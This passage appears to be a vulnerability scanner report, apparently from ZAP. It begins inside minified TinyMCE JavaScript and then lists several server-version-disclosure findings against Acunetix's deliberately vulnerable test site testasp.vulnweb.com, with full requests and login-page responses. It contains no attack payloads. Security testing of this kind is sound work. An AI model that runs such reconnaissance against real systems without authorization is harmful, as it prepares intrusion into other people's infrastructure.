"mceCleanup":tinyMCE._setHTML(this.contentDocument,this.getBody().innerHTML);tinyMCE.setInnerHTML(this.getBody(),tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,this.getBody(),this.visualAid));tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE._setEventsEnabled(this.getBody(),false);this.repaint();tinyMCE.triggerNodeChange();break;case "mceReplaceContent":this.getWin().focus();var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(selectedText.length>0){value=tinyMCE.replaceVar(value,"selection",selectedText);tinyMCE.execCommand('mceInsertContent',false,value);}tinyMCE.triggerNodeChange();break;case "mceSetAttribute":if(typeof(value)=='object'){var targetElms=(typeof(value['targets'])=="undefined")?"p,img,span,div,td,h1,h2,h3,h4,h5,h6,pre,address":value['targets'];var targetNode=tinyMCE.getParentElement(this.getFocusElement(),targetElms);if(targetNode){targetNode.setAttribute(value['name'],value['value']);tinyMCE.triggerNodeChange();}}break;case "mceSetCSSClass":this.execCommand("SetStyleInfo",false,{command:"setattrib",name:"class",value:value});break;case "mceInsertRawHTML":var key='tiny_mce_marker';this.execCommand('mceBeginUndoLevel');this.execCommand('mceInsertContent',false,key);var scrollX=this.getDoc().body.scrollLeft+this.getDoc().documentElement.scrollLeft;var scrollY=this.getDoc().body.scrollTop+this.getDoc().documentElement.scrollTop;var html=this.getBody().innerHTML;if((pos=html.indexOf(key))!=-1)tinyMCE.setInnerHTML(this.getBody(),html.substring(0,pos)+value+html.substring(pos+key.length));this.contentWindow.scrollTo(scrollX,scrollY);this.execCommand('mceEndUndoLevel');break;case "mceInsertContent":var insertHTMLFailed=false;this.getWin().focus();if(tinyMCE.isGecko||tinyMCE.isOpera){try{this.getDoc().execCommand('inserthtml',false,value);}catch(ex){insertHTMLFailed=true;}if(!insertHTMLFailed){tinyMCE.triggerNodeChange();return;}}if(tinyMCE.isOpera&&insertHTMLFailed){this.getDoc().execCommand("insertimage",false,tinyMCE.uniqueURL);var ar=tinyMCE.getElementsByAttributeValue(this.getBody(),"img","src",tinyMCE.uniqueURL);ar[0].outerHTML=value;return;}if(!tinyMCE.isMSIE){var isHTML=value.indexOf('<')!=-1;var sel=this.getSel();var rng=this.getRng();if(isHTML){if(tinyMCE.isSafari){var tmpRng=this.getDoc().createRange();tmpRng.setStart(this.getBody(),0);tmpRng.setEnd(this.getBody(),0);value=tmpRng.createContextualFragment(value);}else value=rng.createContextualFragment(value);}else{var el=document.createElement("div");el.innerHTML=value;value=el.firstChild.nodeValue;value=doc.createTextNode(value);}if(tinyMCE.isSafari&&!isHTML){this.execCommand('InsertText',false,value.nodeValue);tinyMCE.triggerNodeChange();return true;}else if(tinyMCE.isSafari&&isHTML){rng.deleteContents();rng.insertNode(value);tinyMCE.triggerNodeChange();return true;}rng.deleteContents();if(rng.startContainer.nodeType==3){var node=rng.startContainer.splitText(rng.startOffset);node.parentNode.insertBefore(value,node);}else rng.insertNode(value);if(!isHTML){sel.selectAllChildren(doc.body);sel.removeAllRanges();var rng=doc.createRange();rng.selectNode(value);rng.collapse(false);sel.addRange(rng);}else rng.collapse(false);}else{var rng=doc.selection.createRange();if(rng.item)rng.item(0).outerHTML=value;else rng.pasteHTML(value);}tinyMCE.triggerNodeChange();break;case "mceStartTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex==-1){this.typingUndoIndex=this.undoIndex;this.execCommand('mceAddUndoLevel');}break;case "mceEndTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex!=-1){this.execCommand('mceAddUndoLevel');this.typingUndoIndex=-1;}break;case "mceBeginUndoLevel":this.undoRedo=false;break;case "mceEndUndoLevel":this.undoRedo=true;this.execCommand('mceAddUndoLevel');break;case "mceAddUndoLevel":if(tinyMCE.settings['custom_undo_redo']&&this.undoRedo){if(this.typingUndoIndex!=-1){this.undoIndex=this.typingUndoIndex;}var newHTML=tinyMCE.trim(this.getBody().innerHTML);if(newHTML!=this.undoLevels[this.undoIndex]){tinyMCE.executeCallback('onchange_callback','_onchange',0,this);var customUndoLevels=tinyMCE.settings['custom_undo_redo_levels'];if(customUndoLevels!=-1&&this.undoLevels.length>customUndoLevels){for(var i=0;i<this.undoLevels.length-1;i++){this.undoLevels[i]=this.undoLevels[i+1];}this.undoLevels.length--;this.undoIndex--;}this.undoIndex++;this.undoLevels[this.undoIndex]=newHTML;this.undoLevels.length=this.undoIndex+1;tinyMCE.triggerNodeChange(false);}}break;case "Undo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex>0){this.undoIndex--;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "Redo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex<(this.undoLevels.length-1)){this.undoIndex++;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "mceToggleVisualAid":this.visualAid=!this.visualAid;tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "Indent":this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();if(tinyMCE.isMSIE){var n=tinyMCE.getParentElement(this.getFocusElement(),"blockquote");do{if(n&&n.nodeName=="BLOCKQUOTE"){n.removeAttribute("dir");n.removeAttribute("style");}}while(n!=null&&(n=n.parentNode)!=null);}break;case "removeformat":var text=this.getSelectedText();if(tinyMCE.isOpera){this.getDoc().execCommand("RemoveFormat",false,null);return;}if(tinyMCE.isMSIE){try{var rng=doc.selection.createRange();rng.execCommand("RemoveFormat",false,null);}catch(e){}this.execCommand("SetStyleInfo",false,{command:"removeformat"});}else{this.getDoc().execCommand(command,user_interface,value);this.execCommand("SetStyleInfo",false,{command:"removeformat"});}if(text.length==0)this.execCommand("mceSetCSSClass",false,"");tinyMCE.triggerNodeChange();break;default:this.getDoc().execCommand(command,user_interface,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);else tinyMCE.triggerNodeChange();}if(command!="mceAddUndoLevel"&&command!="Undo"&&command!="Redo"&&command!="mceStartTyping"&&command!="mceEndTyping")tinyMCE.execCommand("mceAddUndoLevel");};TinyMCEControl.prototype.queryCommandValue=function(command){return this.getDoc().queryCommandValue(command);};TinyMCEControl.prototype.queryCommandState=function(command){return this.getDoc().queryCommandState(command);};TinyMCEControl.prototype.onAdd=function(replace_element,form_element_name,target_document){var targetDoc=target_document?target_document:document;this.targetDoc=targetDoc;tinyMCE.themeURL=tinyMCE.baseURL+"/themes/"+this.settings['theme'];this.settings['themeurl']=tinyMCE.themeURL;if(!replace_element){alert("Error: Could not find the target element.");return false;}var templateFunction=tinyMCE._getThemeFunction('_getInsertLinkTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertLinkTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getInsertImageTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertImageTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getEditorTemplate');if(eval("typeof("+templateFunction+")")=='undefined'){alert("Error: Could not find the template function: "+templateFunction);return false;}var editorTemplate=eval(templateFunction+'(this.settings, this.editorId);');var deltaWidth=editorTemplate['delta_width']?editorTemplate['delta_width']:0;var deltaHeight=editorTemplate['delta_height']?editorTemplate['delta_height']:0;var html='<span id="'+this.editorId+'_parent">'+editorTemplate['html'];var templateFunction=tinyMCE._getThemeFunction('_handleNodeChange',true);if(eval("typeof("+templateFunction+")")!='undefined')this.settings['handleNodeChangeCallback']=templateFunction;html=tinyMCE.replaceVar(html,"editor_id",this.editorId);this.settings['default_document']=tinyMCE.baseURL+"/blank.htm";this.settings['old_width']=this.settings['width'];this.settings['old_height']=this.settings['height'];if(this.settings['width']==-1)this.settings['width']=replace_element.offsetWidth;if(this.settings['height']==-1)this.settings['height']=replace_element.offsetHeight;if(this.settings['width']==0)this.settings['width']=replace_element.style.width;if(this.settings['height']==0)this.settings['height']=replace_element.style.height;if(this.settings['width']==0)this.settings['width']=320;if(this.settings['height']==0)this.settings['height']=240;this.settings['area_width']=parseInt(this.settings['width']);this.settings['area_height']=parseInt(this.settings['height']);this.settings['area_width']+=deltaWidth;this.settings['area_height']+=deltaHeight;if((""+this.settings['width']).indexOf('%')!=-1)this.settings['area_width']="100%";if((""+this.settings['height']).indexOf('%')!=-1)this.settings['area_height']="100%";if((""+replace_element.style.width).indexOf('%')!=-1){this.settings['width']=replace_element.style.width;this.settings['area_width']="100%";}if((""+replace_element.style.height).indexOf('%')!=-1){this.settings['height']=replace_element.style.height;this.settings['area_height']="100%";}html=tinyMCE.applyTemplate(html);this.settings['width']=this.settings['old_width'];this.settings['height']=this.settings['old_height'];this.visualAid=this.settings['visual'];this.formTargetElementId=form_element_name;if(replace_element.nodeName=="TEXTAREA"||replace_element.nodeName=="INPUT")this.startContent=replace_element.value;else this.startContent=replace_element.innerHTML;if(replace_element.nodeName.toLowerCase()!="textarea"){this.oldTargetElement=replace_element.cloneNode(true);if(tinyMCE.settings['debug'])html+='<textarea wrap="off" id="'+form_element_name+'" name="'+form_element_name+'" cols="100" rows="15"></textarea>';else html+='<input type="hidden" type="text" id="'+form_element_name+'" name="'+form_element_name+'" />';html+='</span>';if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.replaceChild(fragment,replace_element);}else replace_element.outerHTML=html;}else{html+='</span>';this.oldTargetElement=replace_element;if(!tinyMCE.settings['debug'])this.oldTargetElement.style.display="none";if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.insertBefore(fragment,replace_element);}else replace_element.insertAdjacentHTML("beforeBegin",html);}var dynamicIFrame=false;var tElm=targetDoc.getElementById(this.editorId);if(!tinyMCE.isMSIE){if(tElm&&tElm.nodeName.toLowerCase()=="span"){tElm=tinyMCE._createIFrame(tElm);dynamicIFrame=true;}this.targetElement=tElm;this.iframeElement=tElm;this.contentDocument=tElm.contentDocument;this.contentWindow=tElm.contentWindow;}else{if(tElm&&tElm.nodeName.toLowerCase()=="span")tElm=tinyMCE._createIFrame(tElm);else tElm=targetDoc.frames[this.editorId];this.targetElement=tElm;this.iframeElement=targetDoc.getElementById(this.editorId);if(tinyMCE.isOpera){this.contentDocument=this.iframeElement.contentDocument;this.contentWindow=this.iframeElement.contentWindow;dynamicIFrame=true;}else{this.contentDocument=tElm.window.document;this.contentWindow=tElm.window;}this.getDoc().designMode="on";}var doc=this.contentDocument;if(dynamicIFrame){var html=tinyMCE.getParam('doctype')+'<html><head xmlns="http://www.w3.org/1999/xhtml"><base href="'+tinyMCE.settings['base_href']+'" /><title>blank_page</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"></head><body class="mceContentBody"></body></html>';try{this.getDoc().designMode="on";doc.open();doc.write(html);doc.close();}catch(e){this.getDoc().location.href=tinyMCE.baseURL+"/blank.htm";}}if(tinyMCE.isMSIE)window.setTimeout("TinyMCE.prototype.addEventHandlers('"+this.editorId+"');",1);tinyMCE.setupContent(this.editorId,true);return true;};TinyMCEControl.prototype.getFocusElement=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){var doc=this.getDoc();var rng=doc.selection.createRange();var elm=rng.item?rng.item(0):rng.parentElement();}else{var sel=this.getSel();var rng=this.getRng();var elm=rng.commonAncestorContainer;if(!rng.collapsed){if(rng.startContainer==rng.endContainer){if(rng.startOffset-rng.endOffset<2){if(rng.startContainer.hasChildNodes())elm=rng.startContainer.childNodes[rng.startOffset];}}}elm=tinyMCE.getParentElement(elm);}return elm;};var tinyMCE=new TinyMCE();var tinyMCELang=new Array(); |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 334 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3198 |
| Response Body - size: 3,198 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3196 |
| Response Body - size: 3,196 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 3137 |
| Response Body - size: 3,137 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
